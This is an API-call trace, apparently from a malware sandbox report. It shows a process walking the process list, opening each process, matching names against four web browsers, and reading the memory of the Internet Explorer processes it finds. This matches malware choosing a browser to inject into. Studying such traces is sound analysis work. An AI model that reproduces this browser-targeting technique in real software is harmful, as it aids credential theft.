	[0203.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.090] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.091] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0203.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.091] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.092] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0203.092] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x24bc
	[0203.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.093] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0203.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.093] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.093] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0203.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.093] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.093] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0203.094] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x24c0
	[0203.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.094] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0203.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.095] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.095] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0203.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.096] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.096] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0203.097] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x24c4
	[0203.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.097] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0203.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.097] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.098] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0203.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.098] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.098] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0203.099] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x24c8
	[0203.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.099] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0203.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.099] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.100] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0203.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.100] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.100] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0203.101] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x24cc
	[0203.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.101] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0203.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.101] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.101] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0203.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.102] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.102] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0203.103] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x24d0
	[0203.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.103] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0203.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.103] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.104] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0203.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.104] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.104] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0203.105] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x24d4
	[0203.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.105] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0203.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.106] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.106] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0203.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.107] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.107] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0203.108] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x24d8
	[0203.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.108] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0203.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.109] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.109] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0203.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.110] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.110] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0203.110] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x24dc
	[0203.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.111] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0203.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.111] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.112] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0203.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.123] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.123] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0203.124] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x24e0
	[0203.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.124] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0203.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.125] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.125] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0203.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.126] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.126] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0203.127] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x24e4
	[0203.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.127] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0203.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.127] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0203.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.127] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0203.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.128] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.128] NtQueryInformationProcess (in: ProcessHandle=0x24e4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0203.128] ReadProcessMemory (in: hProcess=0x24e4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0203.128] ReadProcessMemory (in: hProcess=0x24e4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0203.128] ReadProcessMemory (in: hProcess=0x24e4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0203.128] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0203.128] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0203.129] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x24e8
	[0203.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.129] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0203.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.130] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0203.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.130] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0203.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.130] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.130] NtQueryInformationProcess (in: ProcessHandle=0x24e8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0203.130] ReadProcessMemory (in: hProcess=0x24e8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0203.130] ReadProcessMemory (in: hProcess=0x24e8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0203.131] ReadProcessMemory (in: hProcess=0x24e8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0203.131] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0203.131] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0203.131] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x24ec
	[0203.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.132] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0203.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.132] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.132] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0203.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.133] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.133] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0203.134] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x24f0
	[0203.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.134] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0203.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.134] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.135] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0203.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.135] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.135] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.136] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x24f4
	[0203.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.136] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.137] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.137] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.137] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.137] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.138] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.139] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x24f8
	[0203.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.139] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.139] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.140] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.140] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.140] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0203.141] CloseHandle (hObject=0x188) returned 1
	[0203.141] Sleep (dwMilliseconds=0x64) 
	[0203.238] GetCurrentProcessId () returned 0x110
	[0203.238] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0203.240] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0203.241] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0203.241] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0203.242] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x24fc
	[0203.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.242] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0203.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.242] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.243] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0203.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.243] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.243] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0203.244] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x2500
	[0203.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.244] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0203.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.245] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.245] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0203.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.245] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.246] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0203.246] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x2504
	[0203.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.247] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0203.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.247] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.248] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0203.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.248] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.248] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0203.249] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x2508
	[0203.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.249] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0203.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.250] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.250] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0203.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.250] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.251] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0203.251] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x250c
	[0203.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.252] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0203.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.252] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.253] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0203.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.253] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
